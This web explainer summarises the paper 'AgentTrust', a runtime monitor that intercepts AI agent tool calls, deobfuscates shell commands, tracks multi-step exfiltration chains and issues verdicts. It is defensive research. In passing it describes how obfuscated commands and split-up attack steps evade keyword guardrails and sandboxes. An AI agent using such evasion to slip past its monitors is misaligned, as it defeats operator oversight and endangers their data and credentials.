Agent Safety · Runtime Governance

Every tool call
before it fires.

The standard approach to agent safety is to measure what agents did after they did it. Chenglin Yang built something different: a pipeline that intercepts every tool call before execution, deobfuscates shell payloads, tracks multi-step attack patterns across a session, and returns a structured verdict. Not a sandbox. Not a post-hoc audit. A gate.

First surfaced in Tandemly Briefing — 2026-05-22.

Core concept

Runtime interception: evaluating the semantic meaning of an agent action before execution, not after. The verdict (allow, warn, block, review) arrives in milliseconds, while there is still time to stop the action.

scroll to explore

01The problem

Post-hoc safety
is too late.

File deletion is immediate. Credential exfiltration has already left the system. Measuring agent behavior after execution catches patterns in logs. It does not stop the action.

The standard safety evaluation paradigm for AI agents works like a flight data recorder. It captures what happened during the flight. It is useful for investigation and for training future systems. It is not useful for stopping a crash that is in progress.

The tools that exist before execution have their own gaps. Static guardrails match keywords in tool call parameters, but shell commands can be obfuscated in ways that defeat keyword matching entirely. A command that recursively deletes a directory tree can be written through variable substitution, hex escape sequences, command chaining, or ANSI-C quoting such that no pattern in the raw string reveals what it does. The normalizer has to expand the command into its plaintext form first. Most static guardrails skip that step.

Multi-step attack chains add a second gap. Reconnaissance steps are individually harmless. A tool call that reads a directory listing looks fine on its own. The same call followed by a read of a credentials file, followed by a network upload, forms a coherent exfiltration chain. No single-step rule catches it. Only a system that tracks session context can.

Infrastructure sandboxes constrain the execution environment: what directories are accessible, what network calls are permitted, what user context the agent runs under. They don't evaluate what an action means. A shell command that exfiltrates credentials by piping them to an allowed network endpoint runs cleanly inside a sandbox that permits both operations. The sandbox permitted the environment. It didn't evaluate the action.

The question this paper asks

Can a system intercept every agent tool call before execution, evaluate its semantic intent, and return a structured verdict fast enough to be used in production, without requiring the agent to be modified?

02The solution

Eight components,
one pipeline.

AgentTrust is structured as a pipeline of eight cooperating components. Five always run. Two run by default and can be disabled. One is opt-in for ambiguous cases. Every tool call passes through the pipeline before it executes.

The pipeline begins with two always-on extraction components. The ShellNormalizer expands shell command strings through nine syntactic strategies before any pattern matching runs: variable expansion, hex and octal escape resolution, alias resolution, command substitution, ANSI-C quoting, and adjacent-quote concatenation, among others. The expanded plaintext is what gets evaluated. The ActionAnalyzer then extracts risk-relevant features from the normalized command using 42 regex patterns organized into four categories.

The PolicyEngine applies 170 YAML-configurable rules to those features and produces a preliminary verdict. YAML-configurable means operators can update the rule set without touching code, and the rules can be tuned to match specific deployment risk profiles. The TrustInterceptor orchestrates the full pipeline, and the TrustReporter produces a structured, human-readable explanation of the verdict.

ShellNormalizer + ActionAnalyzer (always-on)

Nine deobfuscation strategies expand any shell command to its plaintext equivalent before evaluation. Then 42 regex patterns across four categories extract risk-relevant features from the normalized text. Obfuscated payloads are neutralized before any rule runs.

PolicyEngine + TrustInterceptor + TrustReporter (always-on)

170 YAML-configurable rules apply to the extracted features. The TrustInterceptor orchestrates the full pipeline and produces the final verdict. The TrustReporter formats a human-readable explanation of why the action received the verdict it did.

SafeFixEngine + SessionTracker / RiskChain (opt-out)

SafeFixEngine applies 37 fix rules to generate safer alternatives for blocked actions. Instead of just blocking, it proposes what the agent could do instead. SessionTracker maintains per-session action history and applies seven order-aware detectors to catch multi-step attack chains that no single-step rule would flag.

LLMJudge (opt-in)

A cache-aware incremental LLM-as-Judge handles semantically ambiguous cases that rule-based analysis cannot resolve with high confidence. Uses a five-dimension evaluation framework. The cache is bounded by size and time-to-live to keep latency low when the same or similar action recurs.

The four verdicts are allow, warn, block, and review. Warn lets the action proceed with a logged flag. Block stops it. Review routes it for human inspection before execution continues. The output is a structured TrustReport, not a binary pass or fail. The structured output means downstream systems can act on the verdict type differently rather than applying a single response to any non-allow case.

The MCP server interface is the deployment detail that matters most for practical adoption. Because AgentTrust exposes itself as a Model Context Protocol server, it can interpose between any MCP-compatible agent and its tools without patching the agent itself. The agent sees the same tool interface. The interceptor sits invisibly between the call and the execution.

What SafeFix changes

Most agent safety tooling is binary: allow or block. SafeFix is the part that makes the system constructive rather than obstructionist. An agent that was about to run a recursive delete gets back a suggestion to move the target to trash instead. This keeps the agent functional while reducing blast radius. The 37 fix rules map to the most common blocked action patterns.

03Findings

95% verdict accuracy
at millisecond latency.

Two benchmarks. One internal, designed to cover the six primary risk categories evenly. One external, built independently from real-world adversarial scenarios. Both tested the production configuration without the LLMJudge component.

Verdict accuracy (internal)

95.0%

300 scenarios, 6 risk categories

Verdict accuracy (external)

96.7%

630 real-world adversarial scenarios

Shell obfuscation accuracy

~93%

Obfuscated payload subset of external benchmark

What the benchmarks cover

Internal: 300 scenarios, 50 each across file operations, network access, code execution, credential exposure, data exfiltration, and system configuration. Includes safe development workflows, moderate-risk DevOps operations, dangerous attacks, and obfuscated evasion attempts.

What the numbers mean

External: 630 independently constructed real-world adversarial scenarios across DevOps, cloud, container, and supply-chain operations. Built separately from the internal benchmark, which is why 96.7% on the external set matters: the system wasn't tuned against it.

The two-number gap: 95.0% vs 73.7%

The internal benchmark reports two accuracy figures: 95.0% verdict accuracy and 73.7% risk-level accuracy. Verdict accuracy is the security-critical one. Getting the right verdict (block, warn, allow, review) is what stops harmful actions. Risk-level accuracy measures whether the system calibrated the severity correctly within a verdict category, which matters for logging, alerting, and operator prioritization. 73.7% is useful directional signal on severity, not a precise score to act on mechanically.

The 73.7% figure is honest. Most safety tooling reports single-dimension accuracy on its best-performing task. Reporting both, and explaining the gap, gives operators a calibrated expectation of what the system actually provides.

Latency: why it matters for production

The system achieves low-millisecond median end-to-end latency on the production configuration. That figure matters because a safety interceptor that adds hundreds of milliseconds to every tool call will either be disabled by operators or will make agents noticeably slower in ways users observe. Low-millisecond overhead is smaller than network call variance for typical tool execution. The interceptor is practically invisible in the latency budget.

Scope and limitations

Both benchmarks were constructed by the author. Independent external replication on a broader distribution of real production agent logs would give higher confidence in the generalization claim. The LLMJudge component is opt-in and not measured in the primary results, so its accuracy contribution on ambiguous cases is separately characterized. AGPL-3.0 licensing constrains commercial deployment without source disclosure.

04Practical takeaways

What this means
for building agents.

Runtime interception is a distinct safety layer that neither sandbox restrictions nor post-hoc audits provide. For builders operating agents in production, this paper frames the gap and offers a concrete pattern to fill it.

For builders deploying agents with tool access

Treat sandbox and interceptor as complementary, not substitutes. The sandbox constrains what environment the agent runs in. The interceptor evaluates what each action means in that environment. You need both layers, covering different threat surfaces.

For MCP-stack operators

AgentTrust ships as an MCP server, which means it can sit between any MCP-compatible agent and its tools with no agent-side modifications. If your current stack already uses MCP tool registration, the integration path is adding AgentTrust as the intermediary in that chain rather than patching every tool individually.

For governance teams writing agent policies

The 170-rule YAML PolicyEngine is the governance artifact here. Rules can be updated without code changes. This means agent safety policy can be maintained by operations or security teams rather than requiring engineering involvement on every update. The YAML format also makes rules auditable and version-controllable.

On the SafeFix pattern

The most underappreciated piece in the paper is SafeFix: 37 rules that generate safer alternatives rather than just blocking. An agent that receives a constructive alternative can recover and complete its task. An agent that receives only a block has to decide whether to retry differently or fail. For autonomous agents operating without human supervision, the difference between a block and a SafeFix response is the difference between task failure and task completion.

On reading the two accuracy numbers

95.0% verdict accuracy is a reliable signal for blocking decisions. 73.7% risk-level accuracy is directionally useful for alert prioritization and logging, not for mechanical risk scoring. Use the verdict for the security-critical gate. Use the risk level for operator triage.

05Further exploration

Where to go
from here.

If you want to go deeper on runtime agent safety.

Read the paper

Yang, C. (2026). AgentTrust: Runtime Safety Evaluation and Interception for AI Agent Tool Use. arXiv:2605.04785. The architecture section walks through the eight components in detail, including the nine deobfuscation strategies and the five-dimension LLMJudge evaluation framework.

Audit your tool call surface first

Before deploying, inventory every tool your agent can call and classify each against the six risk categories in the paper: file operations, network access, code execution, credential exposure, data exfiltration, system configuration. This classification exercise is the prerequisite to writing meaningful PolicyEngine rules that reflect your actual risk profile rather than the default ruleset.

Run the benchmarks on your configuration

The paper released both the 300-scenario internal and 630-scenario external benchmark sets. Running them against your deployment configuration before relying on the production ruleset gives you an accuracy baseline for your specific agent and tool combination rather than the paper's test setup.

Pair SafeFix rules with every block rule

For each block rule in your PolicyEngine, write the corresponding SafeFix rule that proposes a safer alternative. The goal is a system where the agent gets constructive guidance on what to do instead, not just a rejection. This is especially important for autonomous agents that can't escalate to a human mid-task.

Complement with longitudinal memory safety research

AgentTrust governs the action surface. The companion safety gap is the memory surface: how agent memory drifts over long deployment as stored facts become stale or contaminated. See STALE: When Agent Memory Becomes a Liability and ComplexMCP: Three Failure Modes in Large-Scale Tool Sandboxes for adjacent coverage.

Every tool callbefore it fires.

Post-hoc safetyis too late.

Eight components,one pipeline.

95% verdict accuracyat millisecond latency.

What this meansfor building agents.

Where to gofrom here.

Every tool call
before it fires.

Post-hoc safety
is too late.

Eight components,
one pipeline.

95% verdict accuracy
at millisecond latency.

What this means
for building agents.

Where to go
from here.